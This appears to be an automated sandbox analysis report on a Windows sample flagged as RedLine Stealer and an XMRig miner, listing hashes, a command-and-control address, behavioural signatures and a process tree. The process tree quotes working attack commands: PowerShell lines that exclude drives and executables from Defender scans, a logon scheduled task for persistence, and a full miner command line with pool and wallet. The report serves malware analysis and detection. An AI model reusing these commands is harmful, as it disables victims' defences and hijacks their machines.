Analysis
- max time kernel: 151s
- max time network: 143s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 07-12-2021 17:10
Static task
static1
General
- Target: 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe
- Size: 863KB
- MD5: 669afee3432ad5f508a2c593610725e8
- SHA1: 9735d6ac5053b9eed2b6fffc37696707e94061dd
- SHA256: 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5
- SHA512: 6034bca1ca5b3c8cd15b29b295e841afb0eb3320084c34c63ad704334577de9422cddbbe062d41c0289d817df8bf50e204eb27e9d66721793bdab62058bbbb5e
Malware Config
Extracted
redline
91.243.32.50:63948
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule
behavioral1/memory/1292-120-0x0000000000400000-0x0000000000420000-memory.dmp family_redline
behavioral1/memory/1292-121-0x000000000041BB2E-mapping.dmp family_redline
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule
behavioral1/memory/3124-282-0x000000014030F3F8-mapping.dmp xmrig
behavioral1/memory/3124-297-0x0000000140000000-0x0000000140786000-memory.dmp xmrig
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
pid process
596 WindowsDefender.exe
376 Java.exe
3984 RuntimeBroker.exe
1228 services64.exe
3636 sihost64.exe
-
Drops startup file 1 IoCs
Processes:
description ioc process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 4 IoCs
Processes:
description ioc process
File created C:\Windows\system32\services64.exe Java.exe
File opened for modification C:\Windows\system32\services64.exe Java.exe
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe services64.exe
File created C:\Windows\system32\Microsoft\Libs\WR64.sys services64.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description pid process target process
PID 2828 set thread context of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 1228 set thread context of 3124 1228 services64.exe svchost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid pid_target process target process
3952 596 WerFault.exe WindowsDefender.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
1292 RegAsm.exe
376 Java.exe
2976 powershell.exe
596 WindowsDefender.exe
596 WindowsDefender.exe
596 WindowsDefender.exe
2976 powershell.exe
2976 powershell.exe
1292 RegAsm.exe
1292 RegAsm.exe
1788 powershell.exe
1788 powershell.exe
1788 powershell.exe
1228 services64.exe
1228 services64.exe
2308 powershell.exe
2308 powershell.exe
2308 powershell.exe
3124 svchost.exe
3124 svchost.exe
1268 powershell.exe
1268 powershell.exe
1268 powershell.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3952 WerFault.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
3124 svchost.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 1292 RegAsm.exe
Token: SeDebugPrivilege 376 Java.exe
Token: SeDebugPrivilege 2976 powershell.exe
Token: SeDebugPrivilege 596 WindowsDefender.exe
Token: 35 3984 RuntimeBroker.exe
Token: SeIncreaseQuotaPrivilege 2976 powershell.exe
Token: SeSecurityPrivilege 2976 powershell.exe
Token: SeTakeOwnershipPrivilege 2976 powershell.exe
Token: SeLoadDriverPrivilege 2976 powershell.exe
Token: SeSystemProfilePrivilege 2976 powershell.exe
Token: SeSystemtimePrivilege 2976 powershell.exe
Token: SeProfSingleProcessPrivilege 2976 powershell.exe
Token: SeIncBasePriorityPrivilege 2976 powershell.exe
Token: SeCreatePagefilePrivilege 2976 powershell.exe
Token: SeBackupPrivilege 2976 powershell.exe
Token: SeRestorePrivilege 2976 powershell.exe
Token: SeShutdownPrivilege 2976 powershell.exe
Token: SeDebugPrivilege 2976 powershell.exe
Token: SeSystemEnvironmentPrivilege 2976 powershell.exe
Token: SeRemoteShutdownPrivilege 2976 powershell.exe
Token: SeUndockPrivilege 2976 powershell.exe
Token: SeManageVolumePrivilege 2976 powershell.exe
Token: 33 2976 powershell.exe
Token: 34 2976 powershell.exe
Token: 35 2976 powershell.exe
Token: 36 2976 powershell.exe
Token: SeDebugPrivilege 1788 powershell.exe
Token: SeIncreaseQuotaPrivilege 1788 powershell.exe
Token: SeSecurityPrivilege 1788 powershell.exe
Token: SeTakeOwnershipPrivilege 1788 powershell.exe
Token: SeLoadDriverPrivilege 1788 powershell.exe
Token: SeSystemProfilePrivilege 1788 powershell.exe
Token: SeSystemtimePrivilege 1788 powershell.exe
Token: SeProfSingleProcessPrivilege 1788 powershell.exe
Token: SeIncBasePriorityPrivilege 1788 powershell.exe
Token: SeCreatePagefilePrivilege 1788 powershell.exe
Token: SeBackupPrivilege 1788 powershell.exe
Token: SeRestorePrivilege 1788 powershell.exe
Token: SeShutdownPrivilege 1788 powershell.exe
Token: SeDebugPrivilege 1788 powershell.exe
Token: SeSystemEnvironmentPrivilege 1788 powershell.exe
Token: SeRemoteShutdownPrivilege 1788 powershell.exe
Token: SeUndockPrivilege 1788 powershell.exe
Token: SeManageVolumePrivilege 1788 powershell.exe
Token: 33 1788 powershell.exe
Token: 34 1788 powershell.exe
Token: 35 1788 powershell.exe
Token: 36 1788 powershell.exe
Token: SeDebugPrivilege 1228 services64.exe
Token: SeDebugPrivilege 2308 powershell.exe
Token: SeLockMemoryPrivilege 3124 svchost.exe
Token: SeLockMemoryPrivilege 3124 svchost.exe
Token: SeIncreaseQuotaPrivilege 2308 powershell.exe
Token: SeSecurityPrivilege 2308 powershell.exe
Token: SeTakeOwnershipPrivilege 2308 powershell.exe
Token: SeLoadDriverPrivilege 2308 powershell.exe
Token: SeSystemProfilePrivilege 2308 powershell.exe
Token: SeSystemtimePrivilege 2308 powershell.exe
Token: SeProfSingleProcessPrivilege 2308 powershell.exe
Token: SeIncBasePriorityPrivilege 2308 powershell.exe
Token: SeCreatePagefilePrivilege 2308 powershell.exe
Token: SeBackupPrivilege 2308 powershell.exe
Token: SeRestorePrivilege 2308 powershell.exe
Token: SeShutdownPrivilege 2308 powershell.exe
-
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
description pid process target process
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 2828 wrote to memory of 1292 2828 75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe RegAsm.exe
PID 1292 wrote to memory of 596 1292 RegAsm.exe WindowsDefender.exe
PID 1292 wrote to memory of 596 1292 RegAsm.exe WindowsDefender.exe
PID 1292 wrote to memory of 376 1292 RegAsm.exe Java.exe
PID 1292 wrote to memory of 376 1292 RegAsm.exe Java.exe
PID 376 wrote to memory of 500 376 Java.exe cmd.exe
PID 376 wrote to memory of 500 376 Java.exe cmd.exe
PID 500 wrote to memory of 2976 500 cmd.exe powershell.exe
PID 500 wrote to memory of 2976 500 cmd.exe powershell.exe
PID 376 wrote to memory of 1416 376 Java.exe cmd.exe
PID 376 wrote to memory of 1416 376 Java.exe cmd.exe
PID 1292 wrote to memory of 3984 1292 RegAsm.exe RuntimeBroker.exe
PID 1292 wrote to memory of 3984 1292 RegAsm.exe RuntimeBroker.exe
PID 1416 wrote to memory of 3132 1416 cmd.exe schtasks.exe
PID 1416 wrote to memory of 3132 1416 cmd.exe schtasks.exe
PID 500 wrote to memory of 1788 500 cmd.exe powershell.exe
PID 500 wrote to memory of 1788 500 cmd.exe powershell.exe
PID 376 wrote to memory of 2068 376 Java.exe cmd.exe
PID 376 wrote to memory of 2068 376 Java.exe cmd.exe
PID 2068 wrote to memory of 1228 2068 cmd.exe services64.exe
PID 2068 wrote to memory of 1228 2068 cmd.exe services64.exe
PID 1228 wrote to memory of 2116 1228 services64.exe cmd.exe
PID 1228 wrote to memory of 2116 1228 services64.exe cmd.exe
PID 2116 wrote to memory of 2308 2116 cmd.exe powershell.exe
PID 2116 wrote to memory of 2308 2116 cmd.exe powershell.exe
PID 1228 wrote to memory of 3636 1228 services64.exe sihost64.exe
PID 1228 wrote to memory of 3636 1228 services64.exe sihost64.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 1228 wrote to memory of 3124 1228 services64.exe svchost.exe
PID 2116 wrote to memory of 1268 2116 cmd.exe powershell.exe
PID 2116 wrote to memory of 1268 2116 cmd.exe powershell.exe
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\75b40e9d9822fdb06848f5ba2932e5878ac672180bc7dd3ab82ad42fab41ecc5.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    Command line: #cmd
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\WerFault.exe
        Command line: C:\Windows\system32\WerFault.exe -u -p 596 -s 1748
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
    - [3] C:\Users\Admin\AppData\Local\Temp\Java.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Java.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Creates scheduled task(s)
      - [4] C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\services64.exe
          Command line: C:\Windows\system32\services64.exe
          - Executes dropped EXE
          - Drops file in System32 directory
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\cmd.exe
            Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
              - Suspicious behavior: EnumeratesProcesses
          - [6] C:\Windows\system32\Microsoft\Libs\sihost64.exe
            Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
            - Executes dropped EXE
          - [6] C:\Windows\System32\svchost.exe
            Command line: C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="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" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
      - Executes dropped EXE
      - Drops startup file
      - Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 5b17a7a44faa0e687e03d67431f312da
SHA1 881de933daac79c99066785ae4af18d9d82ea57a
SHA256 9652bc7f37b2703bbe1777628332e6e11a0d2e18ca1597aa989c2526df15aa33
SHA512 146245348e34870ba4b9ed8e017ab2e3b0363c59e9d9ebbe15bf0576f4490da6056d7868c8b7924c66638e79075a5b16d85f4e5b9aac579fc47b6704509100fe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 aeac747c804bb9193fb2a4bef2ed3b03
SHA1 6d18913d50c2ca520a460902ea611b23b994654c
SHA256 54ede086c49869a169a51de91a2f3b8ae85765bc6dc6c883b71cb24b496234b5
SHA512 be46fabe9c1e7807283088e09ff525681664f6955af12e75b84b4f9fca8c56dc3a99e84643278d5d0c4e5ebe5a8492ca04985834062e961286156b1bb09777dd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 e8d42b7e2ae1172eccd84d20ae14642f
SHA1 ff4ef5d5430a95c1f1490381628fbe39c8995896
SHA256 9bb361218f686d38f5b265076464d57597a36fe685e05dce1e4fc2fb165e843a
SHA512 056da1c57678025233658014ee36b04297bb592fbdb20742084a650ab2a42c6f81daa88739a66c0fee9cfff620e711aa8cb32ebe346021d3165920d6b06d833c
-
C:\Users\Admin\AppData\Local\Temp\Java.exe
MD5 dbdcba032867d48ebab99abcbdb217f5
SHA1 9fb3a411252e02a09dc40c923cbd599c54c377bf
SHA256 9b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA512 9cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
MD5 c9c8df33087231faec96c4381c8ac70c
SHA1 f8fba3eb9dd9bc0483e8052d6fd02145ed645a5a
SHA256 f2ed472b058788a5faaeacd18a02fbf8d7cee8f8a93812fdcae53c5656118c6f
SHA512 221d0a71234a62ea52a7f9a45c60067ef7d0675d6e4e5bd2283941aca31cffbd8e8aa5909e098867f67bd02c5e20add0e7f1e722f0ebf8dc755b5ccd3c1eadc7
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
MD5 819c13238cf641935b8a8a70ea1e9fd1
SHA1 cb1019f3efa0178a1556b578572d2a818d018ff0
SHA256 1a16d707abed6b9664fe9ad5de4ed134387c5f785ec969dfaec54ec2c3fbf7fe
SHA512 c5cab13acffe6727fc9f66cfb745e0db3db571cc55a072e41c5e1931b3272f0f1b2cc626f90955decd872f0cb86bade017a6a9ca60aad0c10a4ccf9a544de2dd
-
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5 ef3d9e1c88032ad42198642596cf23c8
SHA1 619cf4f348c93abe92a356060a670d9eb13416be
SHA256 a854e14d77bba877ca4598cfba35e30f72dbeff7161ba4f380c1c11bf173cce6
SHA512 ba65651f56312fa868c8e476bcd185cf9c6876ac2658a6df47fd5493fb00a6c356be9626c3cea3abe581f097f41a377247865380a48a4a201afa03b5fb4ad382
-
C:\Windows\System32\services64.exe
MD5 dbdcba032867d48ebab99abcbdb217f5
SHA1 9fb3a411252e02a09dc40c923cbd599c54c377bf
SHA256 9b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA512 9cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5 ef3d9e1c88032ad42198642596cf23c8
SHA1 619cf4f348c93abe92a356060a670d9eb13416be
SHA256 a854e14d77bba877ca4598cfba35e30f72dbeff7161ba4f380c1c11bf173cce6
SHA512 ba65651f56312fa868c8e476bcd185cf9c6876ac2658a6df47fd5493fb00a6c356be9626c3cea3abe581f097f41a377247865380a48a4a201afa03b5fb4ad382
-
C:\Windows\system32\services64.exe
MD5 dbdcba032867d48ebab99abcbdb217f5
SHA1 9fb3a411252e02a09dc40c923cbd599c54c377bf
SHA256 9b2319bdc904a95707d929a031ae99a83410ba446e070aee5113910bcbceb2d5
SHA512 9cad062aa7961501ddf7f3bd3f9a1c755c67bc8fbf913a75c8365e54287dea2f69ee23606ad00f3eff5df4c8f8d37f4c8b3b097bc45648658e35865a628257ed
-
- memory/376-148-0x0000000000FD0000-0x0000000000FD1000-memory.dmp  Filesize 4KB
- memory/376-153-0x0000000001180000-0x0000000001182000-memory.dmp  Filesize 8KB
- memory/376-146-0x0000000000590000-0x0000000000591000-memory.dmp  Filesize 4KB
- memory/376-143-0x0000000000000000-mapping.dmp
- memory/500-149-0x0000000000000000-mapping.dmp
- memory/596-157-0x000002A04E1F0000-0x000002A04E4EC000-memory.dmp  Filesize 3.0MB
- memory/596-350-0x00007FFBD4CB0000-0x00007FFBD4E8B000-memory.dmp  Filesize 1.9MB
- memory/596-138-0x0000000000000000-mapping.dmp
- memory/596-172-0x000002A033F60000-0x000002A033F62000-memory.dmp  Filesize 8KB
- memory/596-141-0x000002A033860000-0x000002A033861000-memory.dmp  Filesize 4KB
- memory/596-347-0x000002A033F64000-0x000002A033F66000-memory.dmp  Filesize 8KB
- memory/596-195-0x000002A033F62000-0x000002A033F64000-memory.dmp  Filesize 8KB
- memory/596-167-0x000002A033EF0000-0x000002A033EF1000-memory.dmp  Filesize 4KB
- memory/1228-265-0x000000001C7B0000-0x000000001C7B2000-memory.dmp  Filesize 8KB
- memory/1228-243-0x0000000000000000-mapping.dmp
- memory/1268-342-0x000001F43E078000-0x000001F43E079000-memory.dmp  Filesize 4KB
- memory/1268-308-0x000001F43E070000-0x000001F43E072000-memory.dmp  Filesize 8KB
- memory/1268-335-0x000001F43E076000-0x000001F43E078000-memory.dmp  Filesize 8KB
- memory/1268-302-0x0000000000000000-mapping.dmp
- memory/1268-310-0x000001F43E073000-0x000001F43E075000-memory.dmp  Filesize 8KB
- memory/1292-127-0x0000000005100000-0x0000000005101000-memory.dmp  Filesize 4KB
- memory/1292-124-0x00000000056A0000-0x00000000056A1000-memory.dmp  Filesize 4KB
- memory/1292-129-0x0000000005140000-0x0000000005141000-memory.dmp  Filesize 4KB
- memory/1292-130-0x00000000061B0000-0x00000000061B1000-memory.dmp  Filesize 4KB
- memory/1292-126-0x00000000051A0000-0x00000000051A1000-memory.dmp  Filesize 4KB
- memory/1292-137-0x0000000006F00000-0x0000000006F01000-memory.dmp  Filesize 4KB
- memory/1292-125-0x0000000002C20000-0x0000000002C21000-memory.dmp  Filesize 4KB
- memory/1292-128-0x0000000005090000-0x0000000005696000-memory.dmp  Filesize 6.0MB
- memory/1292-121-0x000000000041BB2E-mapping.dmp
- memory/1292-131-0x0000000005440000-0x0000000005441000-memory.dmp  Filesize 4KB
- memory/1292-120-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize 128KB
- memory/1292-132-0x0000000005560000-0x0000000005561000-memory.dmp  Filesize 4KB
- memory/1292-133-0x0000000005530000-0x0000000005531000-memory.dmp  Filesize 4KB
- memory/1292-134-0x0000000005E20000-0x0000000005E21000-memory.dmp  Filesize 4KB
- memory/1292-135-0x0000000006AE0000-0x0000000006AE1000-memory.dmp  Filesize 4KB
- memory/1292-136-0x00000000071E0000-0x00000000071E1000-memory.dmp  Filesize 4KB
- memory/1416-159-0x0000000000000000-mapping.dmp
- memory/1788-239-0x0000020A617C6000-0x0000020A617C8000-memory.dmp  Filesize 8KB
- memory/1788-240-0x0000020A617C8000-0x0000020A617C9000-memory.dmp  Filesize 4KB
- memory/1788-213-0x0000020A617C3000-0x0000020A617C5000-memory.dmp  Filesize 8KB
- memory/1788-212-0x0000020A617C0000-0x0000020A617C2000-memory.dmp  Filesize 8KB
- memory/1788-199-0x0000000000000000-mapping.dmp
- memory/1788-201-0x0000020A5F9B0000-0x0000020A5F9B2000-memory.dmp  Filesize 8KB
- memory/1788-202-0x0000020A5F9B0000-0x0000020A5F9B2000-memory.dmp  Filesize 8KB
- memory/2068-241-0x0000000000000000-mapping.dmp
- memory/2116-249-0x0000000000000000-mapping.dmp
- memory/2308-250-0x0000000000000000-mapping.dmp
- memory/2308-300-0x000001DA619F8000-0x000001DA619F9000-memory.dmp  Filesize 4KB
- memory/2308-296-0x000001DA619F6000-0x000001DA619F8000-memory.dmp  Filesize 8KB
- memory/2308-268-0x000001DA619F3000-0x000001DA619F5000-memory.dmp  Filesize 8KB
- memory/2308-267-0x000001DA619F0000-0x000001DA619F2000-memory.dmp  Filesize 8KB
- memory/2828-115-0x0000000000FB0000-0x0000000000FB1000-memory.dmp  Filesize 4KB
- memory/2828-117-0x000000001BFC0000-0x000000001BFC2000-memory.dmp  Filesize 8KB
- memory/2828-118-0x000000001BFD0000-0x000000001BFD1000-memory.dmp  Filesize 4KB
- memory/2828-119-0x00000000032E0000-0x00000000032E1000-memory.dmp  Filesize 4KB
- memory/2976-152-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-156-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-198-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-181-0x000001F570756000-0x000001F570758000-memory.dmp  Filesize 8KB
- memory/2976-174-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-160-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-158-0x000001F5706E0000-0x000001F5706E1000-memory.dmp  Filesize 4KB
- memory/2976-168-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-171-0x000001F570753000-0x000001F570755000-memory.dmp  Filesize 8KB
- memory/2976-154-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-150-0x0000000000000000-mapping.dmp
- memory/2976-151-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-170-0x000001F570750000-0x000001F570752000-memory.dmp  Filesize 8KB
- memory/2976-162-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-173-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-155-0x000001F5567E0000-0x000001F5567E2000-memory.dmp  Filesize 8KB
- memory/2976-211-0x000001F570758000-0x000001F570759000-memory.dmp  Filesize 4KB
- memory/3124-297-0x0000000140000000-0x0000000140786000-memory.dmp  Filesize 7.5MB
- memory/3124-334-0x0000029B32AD0000-0x0000029B32AF0000-memory.dmp  Filesize 128KB
- memory/3124-282-0x000000014030F3F8-mapping.dmp
- memory/3124-351-0x0000029B343A0000-0x0000029B343C0000-memory.dmp  Filesize 128KB
- memory/3124-352-0x0000029B343A0000-0x0000029B343C0000-memory.dmp  Filesize 128KB
- memory/3124-353-0x0000029B343C0000-0x0000029B343E0000-memory.dmp  Filesize 128KB
- memory/3132-166-0x0000000000000000-mapping.dmp
- memory/3636-295-0x0000000001380000-0x0000000001382000-memory.dmp  Filesize 8KB
- memory/3636-260-0x0000000000000000-mapping.dmp
- memory/3984-161-0x0000000000000000-mapping.dmp